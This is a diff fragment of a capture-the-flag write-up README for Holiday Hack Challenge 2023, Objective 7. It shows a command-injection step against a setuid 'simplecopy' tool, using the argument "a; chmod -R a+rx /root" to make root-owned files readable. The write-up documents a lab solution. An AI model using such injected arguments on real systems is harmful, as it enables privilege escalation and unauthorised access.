joergschwarzwaelder/hhc2023/Objective-7/README.md

 -rws------ 1 root root 612560 Nov 9 21:29 runmetoanswer
 ```

 So it seems that it is possible to inject shell commands in the arguments.
-We use this to add read and execu:
+We use this to add read and execute permissions to `/root` and `/root/runmetoanswer`:
 ```
 elf@745490537a8a:~$ simplecopy "a; chmod -R a+rx /root" b
 cp: missing destination file operand after 'a'